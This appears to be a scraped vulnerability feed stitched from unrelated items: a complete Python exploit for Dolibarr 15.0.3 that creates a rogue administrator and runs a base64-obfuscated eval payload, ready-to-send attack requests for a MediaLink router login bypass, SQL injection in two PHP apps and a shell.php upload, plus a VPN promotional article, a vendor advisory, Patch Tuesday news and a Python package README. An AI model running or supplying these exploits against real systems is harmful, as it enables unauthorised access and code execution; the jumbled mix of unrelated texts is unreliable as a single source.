Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.

**2022/10/08 update**

POC:

import requests
from requests.packages import urllib3
import time
import random
import sys
import re

sess \= requests.Session()
pcre \= re.compile(r'name=\\"token\\"\\s+value=\\"(\[^>\]+)\\"\\s\*\[/\]\*>')
def request(method, url, headers\=None, data\=None, proxies\=None, timeout\=30):
    i \= 1
    urllib3.disable\_warnings()
    resp \= None
    proxies \= proxies
    while i <= 3:
        try:
            resp \= sess.request(method\=method, url\=url, headers\=headers,
                                    data\=data, proxies\=proxies, timeout\=timeout, verify\=False)
            break
        except requests.exceptions.TooManyRedirects:
            break
        except requests.exceptions.ConnectionError as e:
            time.sleep(2 + random.randint(1, 4))
        except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout):
            time.sleep(2 + random.randint(1, 4))
        finally:
            i += 1
    if i \> 3:
        print('\[-\]Error retrieve with max retries: {}'.format(url))
    return resp

def exp():
    if len(sys.argv) < 2:
        sys.exit('Usage: python3 {} http://xxxxx.com/'.format(sys.argv\[0\]))
    if sys.argv\[1\]\[\-1\] \== '/':
        base \= sys.argv\[1\].rsplit('/', 1)\[0\]
    else:
        base \= sys.argv\[1\]
    headers \= {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',
    }
    #proxies = {'http': 'http://127.0.0.1:8082', 'https': 'http://127.0.0.1:8082'}
    proxies \= None
    res \= request('GET', base, headers\=headers, proxies\=proxies)
    err\_flag \= 1
    if res:
        print('\[\*\] Attempt to add admin.')
        base \= res.url.rsplit('/', 1)\[0\]
        add\_admin\_url \= '{}/install/step5.php'.format(base)
        data \= {
            'action': 'set',
            'login': 'testadmins',
            'pass': 'testadmins',
            'pass\_verif': 'testadmins',
            'selectlang': 'auto'
        }
        headers\['Content-Type'\] \= 'application/x-www-form-urlencoded'
        res \= request('POST', add\_admin\_url, headers\=headers, data\=data, proxies\=proxies)
        if res and 'created successfully' in res.text or ('exists' in res.text and 'Email  already exists' not in res.text):
            csrf\_token\_url \= '{}/index.php'.format(base)
            res \= request('GET', csrf\_token\_url, headers\=headers, proxies\=proxies)
            if res:
                print('\[\*\] Attempt to login.')
                try:
                    csrf\_token \= pcre.findall(res.text)\[0\]
                except:
                    csrf\_token \= ''
                login\_url \= '{}/index.php?mainmenu=home'.format(base)
                headers\['Referer'\] \= csrf\_token\_url
                data \= {
                    'token':'{}'.format(csrf\_token),
                    'actionlogin': 'login',
                    'loginfunction': 'loginfunction',
                    'username': 'testadmins',
                    'password': 'testadmins'
                }
                res \= request('POST', login\_url, headers\=headers, data\=data, proxies\=proxies)
                if res and res.status\_code \== 200 and 'logout.php' in res.text:
                    print('\[\*\] Attempt to get csrf token.')
                    csrf\_token\_url \= '{}/admin/menus/edit.php?menuId=0&action=create&menu\_handler=eldy\_menu'.format(base)
                    res \= request('GET', csrf\_token\_url, headers\=headers, proxies\=proxies)
                    if res:
                        print('\[\*\] Attemp to inset evil data.')
                        try:
                            csrf\_token \= pcre.findall(res.text)\[0\]
                        except:
                            csrf\_token \= ''
                        inset\_evil\_url \= '{}/admin/menus/edit.php'.format(base)
                        data \= {
                            'token': '{}'.format(csrf\_token),
                            'action': 'add',
                            'menuId': random.randint(10000, 99999),
                            'menu\_handler': 'eldy\_menu',
                            'user': 2,
                            'type': 1,
                            'titre': 1,
                            'url': 1,
                            'enabled': "1==1));$d=base64\_decode('ZWNobyAnPCEtLScmJmVjaG8gcHduZWQhISEmJmlkJiZlY2hvJy0tPic=');$a=base64\_decode('c3lzdGVt');$a($d);//" #execute id command，bypass core/lib/function.lib.php limits
                        }
                        res \= request('POST', inset\_evil\_url, headers\=headers, data\=data, proxies\=proxies)
                        if res and res.history\[0\].status\_code \== 302:
                            print('\[\*\] Attemp to execute command.')
                            request('GET', '{}/admin/menus/index.php'.format(base), headers\=headers, proxies\=proxies)
                            time.sleep(3)
                            evil\_url \= '{}/admin/index.php'.format(base)
                            res \= request('GET', evil\_url, headers\=headers, proxies\=proxies)
                            if res and res.status\_code \== 200 and 'pwned!!!' in res.text:
                                print(res.text\[:100\])
                                print('\[+\] vulnrable! {}'.format(base))
                                err\_flag \= 0
                    
    if err\_flag:
        print('\[-\] {} is not exploitable.'.format(sys.argv\[1\]))

exp()

**1\. Introduction**

Dolibarr ERP & CRM is a modern software package that helps manage your organization's activity (contacts, suppliers, invoices, orders, stocks, agenda…).

It's an Open Source Software suite (written in PHP with optional JavaScript enhancements) designed for small, medium or large companies, foundations and freelancers.

dolibarr<=15.0.3 has an arbitrary add administrator vulnerability and a backend remote code execution vulnerability.

**2\. Vulnerability****2.1 add super administrators without authorization**

Dolibarr does not automatically add install.lock after installation, it needs to be added manually by the user in the documents directory. For this feature, you can add as many super administrators as you want, using the section for adding super administrators during installation: install/step4.php.

**2.2 Backend RCE**

Firstly, use the edit function of menus to add malicious data to the database, here we use file_put_contents to write files.

    POST /dolibarr1502/htdocs/admin/menus/edit.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 299
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
    Cookie: PHPSESSID=mtkbsit3sr99f9relns8b9isbf; DOLINSTALLNOPING_017fb6a80b4fcc706353a7f3b168d939=1; DOLSESSID_90637d005b446cd27f1f5444eb5ac092=2m4fegod13gk193u8g7js4nql5
    Upgrade-Insecure-Requests: 1
    
    token=5de221f6658ef66579740ae1636d24a6&action=add&menuId=12345671&menu_handler=eldy_menu&user=2&type=1&titre=1&url=1&enabled=1%3D%3D1%29%29%3B%24a%3Dbase64_decode%28%27ZmlsZV9wdXRfY29udGVudHM%3D%27%29%3B%24a%28%27.1234.php%27%2Cbase64_decode%28%27PD9waHAgcGhwaW5mbygpOz8%2BCg%3D%3D%27%29%29%3B%2F%2F
    

View the database table llx_menu and successfully add malicious data:

Secondly, access to http://localhost/dolibarr1502/htdocs/admin/menus/index.php, will generate malicious PHP files in the admin/menus/ directory.

**3\. Analysis**

The dol_eval function in htdocs/core/lib/functions.lib.php can execute arbitrary code, the dol\_eval caller also in the verifCond function in this file. If you can control $s and bypass the forbidden restriction (bypass with php features: **variable functions**), you can execute arbitrary code.

Looking for controllable calls to the verifCond function, I found the menuLoad method in htdocs/core/class/menubase.class.php. The menuLoad method has two calls to verifCond.

But $memu is fetched from the database, so go ahead and look at the logic of the $resql statement. Focus on the table: MAIN_DB_PREFIX.menu, and m.entity in (0, $conf->entity), m.menu_handler IN ($this->db->escape($menu_handler),'all')". And $menu_handler is the parameter passed in. The condition to be satisfied is: eldy

$sql = "SELECT m.rowid, m.type, m.module, m.fk\_menu, m.fk\_mainmenu, m.fk\_leftmenu, m.url, m.titre, m.langs, m.perms, m.enabled, m.target, m.mainmenu, m.leftmenu, m.position";
$sql .= " FROM ".MAIN\_DB\_PREFIX."menu as m";
$sql .= " WHERE m.entity IN (0,".$conf\->entity.")";
$sql .= " AND m.menu\_handler IN ('".$this\->db\->escape($menu\_handler)."','all')";
if ($type\_user == 0) $sql .= " AND m.usertype IN (0,2)";
if ($type\_user == 1) $sql .= " AND m.usertype IN (1,2)";
$sql .= " ORDER BY m.position, m.rowid";

So, we need to find the code to insert or modify the table MAIN_DB_PREFIX.menu.

The create function, also located in htdocs/core/class/menubase.class.php, is used to add a piece of data to MAIN_DB_PREFIX.menu, focusing on perms, enabled, entity, and menu_handler. handler, where entityis$conf->entity\` which just meets the conditions described above.

Keep track of the remaining three variables, located in htdocs/admin/menus/edit.php, all of which we can control.

CVE-2022-40871: GitHub - youncyb/dolibarr-rce: DOLIBARR ERP & CRM  rce

By Owais Sultan
Hospitals and medical facilities are lucrative targets for hackers. It’s not enough anymore to keep software updated and…
This is a post from HackRead.com Read the original post: Cybersecurity Threats to Health Services: Why We Should Be Concerned

Hospitals and medical facilities are lucrative targets for hackers. It’s not enough anymore to keep software updated and make backups once a week. Instead, hospitals should ask questions like: “what is a VPN” and “what does a VPN do” to kick-start their journey to safer patient data.

Would you enjoy hearing about your most intimate medical issues on the evening news? It’s already happening. It will keep happening until hospitals, and medical service providers stop underestimating the cybersecurity threat landscape.

The statistics and news headlines are clear: hospitals and medical facilities are choice targets for hackers. Patients are starting to demand that medical services providers do everything they can to keep personal data safe.

Hospitals should be googling questions like “VPN meaning” and “what does a VPN do” to kick start their journey to safer patient data and privacy.

**Why do hackers target hospitals?**

The healthcare industry is highly vulnerable at five pressure points. Hackers know this. They design their attacks to push these buttons to get rapid economic rewards:

1.  A shutdown of medical appliances could kill patients and delay urgent medical  
    Treatment.  
    
2.  The loss of patient medical history could delay the treatment of medical  
    Conditions.  
    
3.  Public backlash and loss of patients’ trust.  
    
4.  The possibility of facing federal and criminal investigations and fines or  
    sanctions. Some medical providers are not equipped to install better security  
    controls, but many simply underestimate the risks.  
    
5.  Hackers can make quick cash from selling Personal Health Information (PHI),  
    which is worth more than ‘ordinary’ Personally Identifiable Information (PII).  
    You can change your credit card or even SSN, but you can’t change your  
    medical history of illnesses, treatments, or surgeries.

According to our sources, Credit cards and related information sell for $1-$2 on the dark web, but PHI can sell for more than $350. Hackers use these detailed medical records to falsify insurance claims, buy high-value drugs, or get medical procedures. 

**How do hackers threaten healthcare services?**

Most of the healthcare industry’s cybersecurity woes start with the weakest link: phishing attacks aimed at everyday workers.

**Phishing**

The first step to ransomware attacks and data breaches is to gain access to an employee’s login credentials. And they do this by carrying out phishing attacks. Cybercriminals bombard mailboxes with unsuspecting emails that contain malicious attachments or links that can download malware or steal login credentials.

They often use the hacked account of one employee to work their way up to someone in the organization that has access to the entire IT system.

**Data breaches**

A careless or overburdened employee may unintentionally click on a malicious link or even lose a device. In today’s work-from-everywhere environment, hackers can steal user credentials if an employee logs into the hospital’s system via a home or public Wi-Fi link without the protection of a virtual private network (VPN).

Once hackers gain access to a system, they can download patients’ healthcare and financial information, steal proprietary research, infiltrate the company’s finance system, divert funds or medical equipment and drugs, or even shut down the entire operation.

**Ransomware attacks**

A ransomware infection locks down your files and system and makes it completely inaccessible. The attacker then demands a ransom to unlock the files. The healthcare industry is particularly vulnerable to this type of attack because ransomware attacks can bring medical services to a complete halt. Medical emergencies can’t wait. The urgency of this situation sometimes forces hospitals to pay the ransom despite the FBI’s advice to the contrary.

**DDoS Attacks**

A Distributed-Denial-of-Service attack (DDoS attack) is when hackers bombard a targeted server with fake connection requests to overwhelm and force the server offline. DDoS attacks can bring every operation in a hospital to an abrupt halt and could even put lives at risk. The criminals usually demand a ransom to stop the attack.

**How can hospitals protect themselves?**

Cyberattacks on hospitals can halt clinical procedures, threaten the quality of patient care, and result in very serious data breaches. Clearly, standard security advice is not good enough. Hospitals should adopt a structured plan to invest in cybersecurity to defend their electronic infrastructure.

**Address the weakest link with cybersecurity Awareness training**

Train staff to view electronic communications as a potential attack surface. Cyber Threat Awareness programs can help to protect staff from phishing attacks and social engineering attempts.

**Enforce Password Security**

In a hospital’s high-pressure environment where staff often share devices and machines, users should have access to a sophisticated password management system to keep unauthorized users out.

**Install a Multi-Factor Authentication system**

Multi-Factor Authentication (MFA) is a secure, simple access control measure that could thwart most hacking attempts.

**Migrate to Ultra-Secure Cloud Computing**

Cloud computing is reliable, cheap, and easy to put in place, especially if outsourced. Reputable cloud storage providers meet HIPAA minimum requirements and can be tailored to meet specific storage and access control needs.

**Enforce data encryption**

Criminals can hijack unencrypted data flying between storage and endpoint terminals. All data should be protected from input to the endpoint. A VPN can encrypt everything that enters and leaves a hospital’s digital system so that hackers can’t decipher the contents.

**What is a VPN, and what does it do?**

VPN technology creates a secure, private tunnel to pass data between, for example, your computer or mobile device and the hospital system’s storage device. It encrypts everything by turning it into an unreadable, useless data salad.

That private communication tunnel protects the data from prying eyes, and the encryption makes the data useless, even if someone manages to intercept it.

**What can a VPN do for hospitals?**

A VPN is critical to data protection, especially under HIPAA rules. A VPN can encrypt data, block unauthorized access, protect IoT equipment and IoT endpoints, block malware, improve email filtering and ensure that patient data remains protected during transit.

**Conclusion**

Hospitals and other health service providers are prime cybercrime targets. At the same time, HIPAA requires that they put in place a range of measures to protect patient data. It’s a tall and challenging order.

Fortunately, digital tools offer extraordinary solutions and safety features, and data encryption is a good place to start. You can use a VPN on iPhone, Android, all Windows and Linux devices, and all IoT devices like monitors, cameras, alarm systems, and other smart tech devices across the entire organization.

Cybersecurity Threats to Health Services: Why We Should Be Concerned

A vulnerability classified as critical was found in Mediabridge Medialink. This vulnerability affects unknown code of the file /index.asp. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210700.

**Exploit Title: Medialink Unauthorized access****Date: 2022-10/12****Exploit Author: Peanut886****Vendor Homepage: http://www.medialinks.net.cn****Version: V3.0****Tested on: windows10 + phpstudy****Description**

In the MediaLink router login interface, request /index.asp, Cookie plus language=en; admin:language=en: bypasses the login interface to achieve unauthorized access.

**Payload used:**

    GET /index.asp HTTP/1.1
    Host: TARGET:PORT
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: SVC://TARGET:PORT/login.asp
    Connection: close
    Cookie: language=en; admin:language=en
    Upgrade-Insecure-Requests: 1
    

**Returns part of the package**

CVE-2022-3465: Vulnerability/MediaLink Unauthorized access.md at main · Peanut886/Vulnerability

In affected versions of Octopus Server it was identified that when a sensitive value is a substring of another value, sensitive value masking will only partially work.

Summary

Sensitive value will only be partially masked when certain substrings exist in the set (CVE-2022-2720)

Advisory Number

2022-18

Discovery Date

08 Aug 2022

Patch Release Date

27 Sep 2022

Advisory Release Date

11 Oct 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2720

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.3.10594 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Server it was identified that when a sensitive value is a substring of another value, sensitive value masking will only partially work.

The versions of Octopus Server affected by this vulnerability are:

*   All 3.x versions after 3.16.4
*   All 4.x versions
*   All 2018.x, 2019.x, 2020.x and 2021.x versions
*   All 2022.1.x versions before 2022.1.3180
*   All 2022.2.x versions before 2022.2.7965
*   All 2022.3.x versions before 2022.3.10586

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.3154
*   2022.2.7934
*   2022.3.10586

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.3.10594). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.3.10594):**

If you have feature version...

...then upgrade to this version

3.16.4 and greater

2022.1.3154 or greater

4.x, 2018.x, 2019.x, 2020.x, 2021.x

2022.1.3154 or greater

2022.1.x

2022.1.3154 or greater

2022.2.x

2022.2.7934 or greater

2022.3.x

2022.3.10586 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2720, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found during internal testing by Adam Mccoy at Octopus Deploy

CVE-2022-2720: Security Advisory 2022-18

Microsoft's Patch Tuesday update for the month of October has addressed a total of 85 security vulnerabilities, including fixes for an actively exploited zero-day flaw in the wild.
Of the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the actively exploited ProxyNotShell flaws in Exchange Server

Microsoft's Patch Tuesday update for the month of October has addressed a total of 85 security vulnerabilities, including fixes for an actively exploited zero-day flaw in the wild.

Of the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the actively exploited ProxyNotShell flaws in Exchange Server.

The patches come alongside updates to resolve 12 other flaws in the Chromium-based Edge browser that have been released since the beginning of the month.

Topping the list of this month's patches is CVE-2022-41033 (CVSS score: 7.8), a privilege escalation vulnerability in Windows COM+ Event System Service. An anonymous researcher has been credited with reporting the issue.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," the company said in an advisory, cautioning that the shortcoming is being actively weaponized in real-world attacks.

The nature of the flaw also means that the issue is likely chained with other flaws to escalate privilege and carry out malicious actions on the infected host.

"This specific vulnerability is a local privilege escalation, which means that an attacker would already need to have code execution on a host to use this exploit," Kev Breen, director of cyber threat research at Immersive Labs, said.

Three other elevation of privilege vulnerabilities of note relate to Windows Hyper-V (CVE-2022-37979, CVSS score: 7.8), Active Directory Certificate Services (CVE-2022-37976, CVSS score: 8.8), and Azure Arc-enabled Kubernetes cluster Connect (CVE-2022-37968, CVSS score: 10.0).

Despite the "Exploitation Less Likely" tag for CVE-2022-37968, Microsoft noted that a successful exploitation of the flaw could permit an "unauthenticated user to elevate their privileges as cluster admins and potentially gain control over the Kubernetes cluster."

Elsewhere, CVE-2022-41043 (CVSS score: 3.3) – an information disclosure vulnerability in Microsoft Office – is listed as publicly known at the time of release. It could be exploited to leak user tokens and other potentially sensitive information, Microsoft said.

Also fixed by Redmond are eight privilege escalation flaws in Windows Kernel, 11 remote code execution bugs in Windows Point-to-Point Tunneling Protocol and SharePoint Server, and yet another elevation of privilege vulnerability in the Print Spooler module (CVE-2022-38028, CVSS score: 7.8).

Lastly, the Patch Tuesday update further addresses two more privilege escalation flaws in Windows Workstation Service (CVE-2022-38034, CVSS score: 4.3) and Server Service Remote Protocol (CVE-2022-38045, CVSS score: 8.8).

Web security company Akamai, which discovered the two shortcomings, said they "take advantage of a design flaw that allows the bypass of \[Microsoft Remote Procedure Call\] security callbacks through caching."

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by several vendors to rectify dozens of vulnerabilities, including —

*   Adobe
*   Android
*   Apache Projects
*   Apple
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   F5
*   Fortinet (including an actively exploited flaw)
*   GitLab
*   Google Chrome
*   IBM
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   NVIDIA
*   Qualcomm
*   Samba
*   SAP
*   Schneider Electric
*   Siemens
*   Trend Micro, and
*   VMware

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_plan.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: H1dd3n

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_plan

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_plan, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_plan HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41532: bug_report/SQLi-1.md at main · yueleve/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_borrower.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: H1dd3n

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_borrower

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_borrower, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_borrower HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41530: bug_report/SQLi-2.md at main · yueleve/bug_report

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Cokutau-CH

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=orders/view\_order&id=

Vulnerability location: /pet\_shop/admin/?page=orders/view\_order&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=orders/view\_order&id=-2%27%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=orders/view\_order&id\=\-2%27%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=39d40bnp4n4treun1nco3uocnm
Connection: close

CVE-2022-41407: Bug_report/SQLi-2.md at main · CokuTau-CH/Bug_report

An arbitrary file upload vulnerability in the /admin/admin_pic.php component of Church Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Church Management System v1.0 by Godfrey De Blessed has arbitrary code execution (RCE)**

BUG\_Author: Cokutau-CH

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Login account: admin/admin (Super Admin account)

Vulnerability url: ip/cman/admin/admin\_pic.php

Loophole location: Church Management System's admin/admin\_pic.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /cman/admin/admin\_pic.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/cman/admin/dashboard.php
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------211491645714374
Content-Length: 327
\-----------------------------211491645714374
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------211491645714374
Content-Disposition: form-data; name="change"
\-----------------------------211491645714374--

The files will be uploaded to this directory \\cman\\admin\\uploads

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41406: Bug_report/RCE-1.md at main · CokuTau-CH/Bug_report

The d8s-file-system package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hashes package. The affected version is 0.1.0.

Democritus functions\[1\] for working with files and directories.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

Once imported, you can use any of the functions listed below.

*   def is\_file(path: str) \-> bool:
        """Determine if the given path is a file."""
    
*   def file\_read(file\_path: str) \-> str:
        """Read the file at the given file\_path as a string."""
    
*   def file\_read\_bytes(file\_path: str) \-> bytes:
        """Read the file at the given file\_path as bytes."""
    
*   def file\_write(file\_path: str, file\_contents: Any) \-> bool:
        """Write the given content to the file at the given path (including a file name)."""
    
*   def file\_append(file\_path: str, file\_contents: Any) \-> bool:
        """Append the given content to the file at the given path (including a file name)."""
    
*   def file\_move(starting\_path: str, destination\_path: str):
        """Move the file from the starting path to the destination path."""
    
*   def file\_copy(starting\_path: str, destination\_path: str, \*, preserve\_metadata: bool \= False):
        """Copy the file from the starting\_path to the destination path."""
    
*   def file\_delete(file\_path: str):
        """Delete the given file."""
    
*   def file\_owner\_name(file\_path: str) \-> str:
        """Find the owner of the file at the given path."""
    
*   def file\_change\_owner(file\_path: str):
        """Change the ownership of the given file."""
    
*   def file\_ssdeep(file\_path: str) \-> str:
        """Find the ssdeep fuzzy hash of the file."""
    
*   def file\_md5(file\_path: str) \-> str:
        """Find the md5 hash of the given file."""
    
*   def file\_sha1(file\_path: str) \-> str:
        """Find the sha1 hash of the given file."""
    
*   def file\_sha256(file\_path: str) \-> str:
        """Find the sha256 hash of the given file."""
    
*   def file\_sha512(file\_path: str) \-> str:
        """Find the sha512 hash of the given file."""
    
*   def file\_name\_escape(file\_name\_arg: str) \-> str:
        """Escape the name of a file so that it can be used as a file name in a file path."""
    
*   def file\_name(file\_path: str) \-> str:
        """Find the file name from the given file path."""
    
*   def file\_name\_windows(windows\_file\_path: str) \-> str:
        """Find the file name from the given windows\_file\_path."""
    
*   def file\_name\_unix(unix\_file\_path: str) \-> str:
        """Find the file name from the given unix\_file\_path."""
    
*   def file\_size(file\_path: str) \-> int:
        """Find the file size."""
    
*   def file\_directory(file\_path: str) \-> str:
        """Return the directory in which the given file resides."""
    
*   def file\_details(file\_path: str) \-> Dict\[str, Union\[str, int\]\]:
        """Get file hashes and file size for the given file."""
    
*   def file\_exists(file\_path: str) \-> bool:
        """Check if the file exists."""
    
*   def file\_is\_readable(file\_path: str) \-> bool:
        """Check if the file is readable."""
    
*   def file\_is\_writable(file\_path: str) \-> bool:
        """Check if the file is writable."""
    
*   def file\_is\_executable(file\_path: str) \-> bool:
        """Check if the file is executable."""
    
*   def file\_contains(file\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False) \-> bool:
        """Return whether or not the file contains the given pattern."""
    
*   def file\_search(file\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False) \-> List\[str\]:
        """Search for the given pattern in the file."""
    
*   def file\_name\_matches(file\_path: str, pattern: str) \-> bool:
        """Return whether or not the file name contains the given pattern."""
    
*   def is\_directory(path: str) \-> bool:
        """Determine if the given path is a directory."""
    
*   def directory\_exists(directory\_path: str) \-> bool:
        """Check if the directory exists."""
    
*   def directory\_file\_names(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List files at the given directory\_path."""
    
*   def directory\_file\_paths(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List the file paths at the given directory\_path."""
    
*   def directory\_copy(src\_path: str, dst\_path: str):
        """Copy the directory from the src\_path to the destination path."""
    
*   def directory\_delete(directory\_path: str):
        """Delete the given directory."""
    
*   def directory\_create(directory\_path: str, mode\=0o777):
        """Create a directory."""
    
*   def directory\_disk\_usage(directory\_path: str):
        """Return the disk usage for the given directory."""
    
*   def directory\_disk\_free\_space(directory\_path: str):
        """Return the free space in the given directory."""
    
*   def directory\_disk\_used\_space(directory\_path: str):
        """Return the used space in the given directory."""
    
*   def directory\_disk\_total\_space(directory\_path: str):
        """Return the total space in the given directory."""
    
*   def home\_directory() \-> str:
        """Return the home directory."""
    
*   def home\_directory\_join(path: str) \-> str:
        """Join the given path with the home directory."""
    
*   def directory\_move(src\_path: str, dst\_path: str):
        """Move the directory from the src\_path to the dst\_path."""
    
